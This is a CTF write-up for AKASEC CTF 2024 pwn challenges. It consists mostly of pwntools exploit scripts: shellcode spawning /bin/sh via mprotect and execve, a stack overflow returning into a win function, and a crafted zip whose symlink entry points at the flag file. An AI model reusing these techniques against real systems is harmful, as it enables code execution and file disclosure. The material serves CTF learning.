
(writeup) AKASEC CTF 2024

good-trip

#!/usr/bin/python3

from pwn import *

# The target binary; binding it to `context` sets arch/bits so that asm()
# further down emits amd64 code.
exe = ELF('./good_trip', checksec=False)
context.binary = exe


# Tube shorthands.  `p` is created later in the script, so each wrapper
# resolves it lazily at call time.
def info(msg):
    """Log a progress line."""
    return log.info(msg)


def sla(msg, data):
    """After `msg` arrives, send `data` followed by a newline."""
    return p.sendlineafter(msg, data)


def sa(msg, data):
    """After `msg` arrives, send `data` with no newline."""
    return p.sendafter(msg, data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def s(data):
    """Send `data` raw, no terminator."""
    return p.send(data)


def sln(msg, num):
    """After `msg` arrives, send `num` in decimal plus a newline."""
    return sla(msg, str(num).encode())


def sn(msg, num):
    """After `msg` arrives, send `num` in decimal with no newline."""
    return sa(msg, str(num).encode())

def GDB():
    """Attach gdb to the local process and pause; a no-op when REMOTE is set."""
    if args.REMOTE:
        return
    gdb.attach(p, gdbscript='''
        b*exec+64
        c
        ''')
    # Block on Enter so the breakpoint is armed before the payload goes out.
    input()


# One tube for the rest of the script: the live service under REMOTE,
# otherwise a local process (which GDB() may attach to).
p = remote('172.210.129.230', 1351) if args.REMOTE else process(exe.path)
GDB()

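# --- layout -------------------------------------------------------------------
SC_BASE = 0x1337131000   # fixed address the program places our input at
STAGE2_OFF = 0x48        # == len(stage 1): stage 2 is read() in right after it
PIVOT_RSP = 0x404a00     # writable address inside the binary used as a stack for
                         # the PLT calls (presumably .bss -- confirm in gdb)

# The program asks for a size first; 0x1000 is enough for both stages.
sln(b'size >> ', 0x1000)

# --- stage 1: mprotect(SC_BASE, 0x1000, RWX) then read(0, SC_BASE+0x48, 0x100)
# Everything goes through the binary's PLT, so rsp has to be sane first.
stage1 = asm(f"""
        mov rsp, {PIVOT_RSP:#x}
        mov rdi, {SC_BASE:#x}
        mov rsi, 0x1000
        mov rdx, 7
        mov rcx, {exe.plt.mprotect}
        call rcx
        xor rdi, rdi
        mov rsi, {SC_BASE + STAGE2_OFF:#x}
        mov rdx, 0x100
        mov rcx, {exe.plt.read}
        call rcx
        nop
        nop
        nop
          """, arch='amd64')
# The nops pad stage 1 to exactly STAGE2_OFF bytes so execution falls straight
# through into the bytes read() just stored.  Warn (don't abort) if the
# assembler produced different encodings than the offsets assume.
if len(stage1) != STAGE2_OFF:
    log.warning("stage 1 is %#x bytes, expected %#x", len(stage1), STAGE2_OFF)

# --- stage 2: execve("/bin/sh", NULL, NULL) via a raw syscall (rax = 0x3b) ---
BIN_SH = int.from_bytes(b'/bin/sh\x00', 'little')   # 0x68732f6e69622f
stage2 = asm(f"""
        mov rbx, {BIN_SH:#x}
        push rbx

        mov rdi, rsp
        xor rsi, rsi
        xor rdx, rdx
        mov rax, 0x3b
        syscall
          """, arch='amd64')

sa(b'>> ', stage1)

# The program's own read() is sized by the 0x1000 we sent, so stage 2 must not
# arrive before that read has returned -- otherwise both stages could be
# swallowed by the same read and the shellcode's read() would presumably hang.
# Timing-based; raise the delay if the remote is flaky.
sleep(2)
s(stage2)

p.interactive()
#AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}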

AKASEC{y34h_You_C4N7_PRO73C7_5om37hIn9_YoU_doN7_h4V3}

bad-trip

#!/usr/bin/python3

from pwn import *

# Patched target plus the libc it ships with; libc is only used for the leak
# arithmetic/logging further down.
exe = ELF('./bad_trip_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
context.binary = exe


# Tube shorthands.  `p` is created later in the script, so each wrapper
# resolves it lazily at call time.
def info(msg):
    """Log a progress line."""
    return log.info(msg)


def sla(msg, data):
    """After `msg` arrives, send `data` followed by a newline."""
    return p.sendlineafter(msg, data)


def sa(msg, data):
    """After `msg` arrives, send `data` with no newline."""
    return p.sendafter(msg, data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def s(data):
    """Send `data` raw, no terminator."""
    return p.send(data)


def sln(msg, num):
    """After `msg` arrives, send `num` in decimal plus a newline."""
    return sla(msg, str(num).encode())


def sn(msg, num):
    """After `msg` arrives, send `num` in decimal with no newline."""
    return sa(msg, str(num).encode())

def GDB():
    """Attach gdb to the local process and pause; a no-op when REMOTE is set."""
    if args.REMOTE:
        return
    gdb.attach(p, gdbscript='''
        b*exec+71
        c
        ''')
    # Block on Enter so the breakpoint is armed before the payload goes out.
    input()


# One tube for the rest of the script: the live service under REMOTE,
# otherwise a local process.
p = remote('172.210.129.230', 1352) if args.REMOTE else process(exe.path)

# GDB()   # uncomment to break at exec+71 on a local run

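# The service prints part of a libc address after "with ".  Judging by the OR
# below, only the low bits are disclosed: the upper bits of the mapping are a
# per-run guess, not a leak, so expect to re-run when they are wrong.  Nothing
# after this depends on it -- the shellcode below walks TLS (fs:) to find libc
# on its own -- so `libc.address` here is diagnostic only.
LIBC_HIGH_BITS_GUESS = 0x7fcb00000000

p.recvuntil(b'with ')
leak = int(p.recvuntil(b'\n', drop=True), 16)
info(f"leak: {leak:#x}")

libc_leak = LIBC_HIGH_BITS_GUESS | leak
libc.address = libc_leak - libc.sym.puts   # the disclosed value is taken to be puts
info(f"libc leak: {libc_leak:#x}")
info(f"libc base: {libc.address:#x}")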

# Single-stage shellcode.  Rough reading of what it does:
#   rdi = *(fs:0x300)           pointer read out of thread-local storage
#   rdi = *(rdi + 120)          followed one more level
#   rdi = rdi - 163210 + 0x111709
#                               rebased onto a libc address; both constants are
#                               specific to the shipped libc.so.6 (re-derive in
#                               gdb for any other build)
#   rsp = 0x6969696a10          pivot to a fixed writable address so `push`
#                               works (presumably the region the challenge maps)
#   push "/bin/sh\0"            29400045130965551 == b"/bin/sh\0" as LE u64
#   rdi = rsp; rsi = rdx = 0; rax = 0x3b (execve)
#   call rcx                    rcx presumably lands on a `syscall` in libc, so
#                               this becomes execve("/bin/sh", 0, 0)
# NOTE(review): the libc base logged above is never used here; the TLS walk is
# what makes the payload independent of the guessed high bits of the leak.
pl = asm(f"""
        mov rdi, [fs:0x300]
        add rdi, 120
        mov rdi, [rdi]
        sub rdi, 163210
        add rdi,0x111709
        mov rsp, 0x6969696a10
        mov rcx, rdi
        mov rbx, 29400045130965551
        push rbx

        mov rdi, rsp
        xor rsi, rsi
        xor rdx, rdx
        mov rax, 0x3b
        call rcx

         """,arch='amd64')

payload = pl

# Sent raw (no newline) after the prompt; the program then jumps into it.
sa(b'>> ',payload)

p.interactive()
#AKASEC{pr3f37CH3M_Li8C_4Ddr35532}

AKASEC{pr3f37CH3M_Li8C_4Ddr35532}

the_absolute_horror_of_the_trip

  • Same technique as bad-trip.
  • The exploit script is unchanged =)))

AKASEC{NoW_You_r34lly_H4V3_7o_pr3F37cH3M_li8C_4DDR5}

yapping

#!/usr/bin/python3

from pwn import *

# The target binary; binding it to `context` sets arch/bits for p32/p64/flat.
exe = ELF('challenge', checksec=False)
context.binary = exe


# Tube shorthands.  `p` is created later in the script, so each wrapper
# resolves it lazily at call time.
def info(msg):
    """Log a progress line."""
    return log.info(msg)


def sla(msg, data):
    """After `msg` arrives, send `data` followed by a newline."""
    return p.sendlineafter(msg, data)


def sa(msg, data):
    """After `msg` arrives, send `data` with no newline."""
    return p.sendafter(msg, data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def s(data):
    """Send `data` raw, no terminator."""
    return p.send(data)


def sln(msg, num):
    """After `msg` arrives, send `num` in decimal plus a newline."""
    return sla(msg, str(num).encode())


def sn(msg, num):
    """After `msg` arrives, send `num` in decimal with no newline."""
    return sa(msg, str(num).encode())

def GDB():
    """Attach gdb to the local process and pause; a no-op when REMOTE is set."""
    if args.REMOTE:
        return
    gdb.attach(p, gdbscript='''
        b* 0x401256

        c
        ''')
    # Block on Enter so the breakpoint is armed before the first payload.
    input()

# One tube for the rest of the script: the live service under REMOTE,
# otherwise a local process (which GDB() may attach to).
p = remote('20.80.240.190', 14124) if args.REMOTE else process(exe.path)
GDB()
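# Every overflow below has the same shape: filler up to offset 108, a dword
# that puts 0x70 back into whatever local lives there, then the 8-byte word at
# offset 0x70 (112) that control is transferred through.  Why that local must
# be 0x70 and what 0x4011f1/0x4011f4 are comes from the disassembly -- not
# visible here; check with the GDB() breakpoint at 0x401256.
FILLER = 108
KEEP_LOCAL = p32(0x70)
# Address in the binary that leads back into another read (inferred from the
# script needing several rounds; verify in gdb).
REENTER = p64(0x4011f4)

# Rounds 1 and 3 are identical: just come back for another overflow.
reenter = b'a' * FILLER + KEEP_LOCAL + REENTER

# NOTE(review): sends are raw and never wait for a prompt, so if the target
# prints anything between rounds these can race; use sa()/sla() if it flakes.
s(reenter)

# Round 2: stage a second pair of words lower in the buffer (0x4011f1 and
# user+0x70), then return into win.
s(b"a" * 88 + flat(0x4011f1, exe.sym.user + 0x70) + b'a' * 4 + KEEP_LOCAL + p64(exe.sym.win))

s(reenter)

# Round 4: the buffer now starts with "admin" (presumably a name/role check),
# padded with spaces (ljust's default), not 'a', and returns into win.
s(b'admin\0\0\0'.ljust(FILLER) + KEEP_LOCAL + p64(exe.sym.win))

p.interactive()
#AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}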

AKASEC{y4pp1n6_15_50m371m35_u53full_9b9b3d9}

zop

#!/usr/bin/python3
import base64
import os
import struct
import subprocess

from pwn import *

# Tube shorthands.  `p` is connected at the bottom of the script, so each
# wrapper resolves it lazily at call time.
def sla(delim, data):
    """After `delim` arrives, send `data` followed by a newline."""
    return p.sendlineafter(delim, data)


def sa(delim, data):
    """After `delim` arrives, send `data` with no newline."""
    return p.sendafter(delim, data)


def s(data):
    """Send `data` raw, no terminator."""
    return p.send(data)


def sl(data):
    """Send `data` followed by a newline."""
    return p.sendline(data)


def r(nbytes):
    """Receive up to `nbytes` bytes."""
    return p.recv(nbytes)


def ru(data):
    """Receive until `data` is seen (inclusive)."""
    return p.recvuntil(data)


def rl():
    """Receive one line."""
    return p.recvline()


# The target binary; also sets context (arch/bits) for any packing helpers.
elf = context.binary = ELF('zop')

def int_from_bytes(bytes):
    """Interpret `bytes` as an unsigned little-endian integer.

    Unused by this script.  The parameter name shadows the builtin `bytes`;
    it is kept as-is so any keyword caller keeps working.
    """
    # Little-endian: byte i contributes b << 8*i.
    return sum(b << (8 * i) for i, b in enumerate(bytes))


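def GDB(proc):
    """Attach gdb to `proc`, breaking on the two zip-parsing routines.

    The original ignored `proc` and attached to the module-level `p`; honouring
    the parameter is what the call site `GDB(p)` expects.
    """
    gdb.attach(proc, gdbscript='''
               b extract_zip
               b parse_lfh
               c
               ''')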

#context.log_level = 'debug'
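# Build a legitimate reference archive of content/a -- handy for comparing the
# real header layout against the handcrafted one below.  Its bytes are only
# printed: `content` is rebuilt from scratch further down, and content/b is
# written but never packed.  `content/` must already exist.
filler = b'AAAAA' * 0x20
for name in ('content/a', 'content/b'):
    with open(name, 'wb') as fh:
        fh.write(filler)

# argv list, no shell.  The arguments are constants here, but the habit costs
# nothing; check=False keeps os.system's "ignore the exit status" behaviour.
subprocess.run(['zip', 'a.zip', 'content/a'], check=False)

with open('a.zip', 'rb') as fh:
    content = fh.read()

print(content)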
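# --- the malicious archive -------------------------------------------------
# Stored (method 0), no EOCD record: one local file header followed by one
# central directory header, which is evidently all the target's parser walks.
# The central entry's external attributes carry Unix mode 0xA000 (S_IFLNK) in
# their high 16 bits, i.e. the entry is declared a *symlink*, and its "data" is
# the link target.  If the extractor honours that, the extracted name becomes
# a link to /chal/flag.txt (classic zip symlink traversal).
LFH_SIG = 0x04034b50            # "PK\x03\x04" (== 67324752)
CDH_SIG = 0x02014b50            # "PK\x01\x02" (== 33639248)
EXT_ATTRS_SYMLINK = 0xa0000000  # S_IFLNK << 16

NAME = b'hahaha\x00'
LFH_EXTRA = b'hihi\x00'
LINK_TARGET = b'/chal/flag.txt\x00'
CDH_EXTRA = b'aaa\x00'
COMMENT = b'aaa\x00'


def _local_file_header(name, extra, data):
    """Return a 30-byte local file header followed by name, extra and `data`.

    compressed_size stays 0 while uncompressed_size = len(data), exactly as in
    the original payload; the parser presumably trusts the latter.
    """
    hdr = struct.pack('<IHHHHHIIIHH',
                      LFH_SIG,
                      0,            # version needed
                      0,            # general-purpose flag
                      0,            # compression method: stored
                      0, 0,         # mod time / mod date
                      0,            # crc32 (evidently not verified)
                      0,            # compressed size
                      len(data),    # uncompressed size
                      len(name),
                      len(extra))
    return hdr + name + extra + data


def _central_dir_header(name, extra, comment, data_len, external_attrs):
    """Return a 46-byte central directory header plus name, extra and comment."""
    hdr = struct.pack('<IHHHHHHIIIHHHHHII',
                      CDH_SIG,
                      0,            # version made by
                      0,            # version needed
                      0,            # general-purpose flag
                      0,            # compression method
                      0, 0,         # mod time / mod date
                      0,            # crc32
                      0,            # compressed size
                      data_len,     # uncompressed size
                      len(name),
                      len(extra),
                      len(comment),
                      0,            # disk number start
                      0,            # internal attrs
                      external_attrs,
                      0)            # offset of the local header
    return hdr + name + extra + comment


content = _local_file_header(NAME, LFH_EXTRA, LINK_TARGET)
content += _central_dir_header(NAME, CDH_EXTRA, COMMENT, len(LINK_TARGET),
                               EXT_ATTRS_SYMLINK)

# The service takes the archive base64-encoded.
payload = base64.b64encode(content)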

# Connect and hand the archive over.  Commented-out tubes are the local /
# debug variants (GDB(p) breaks on extract_zip and parse_lfh).
#p = remote('0', 1349)
p = remote('172.210.129.230', 1349)
#p = process()
#GDB(p)
# The service prompts for the (base64) file and then, presumably, extracts it;
# the symlink entry is what should expose /chal/flag.txt.
sla(b'file', payload)

p.interactive()
#AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}

AKASEC{I7_wa5_700_0BVi0u5_ri9H7?}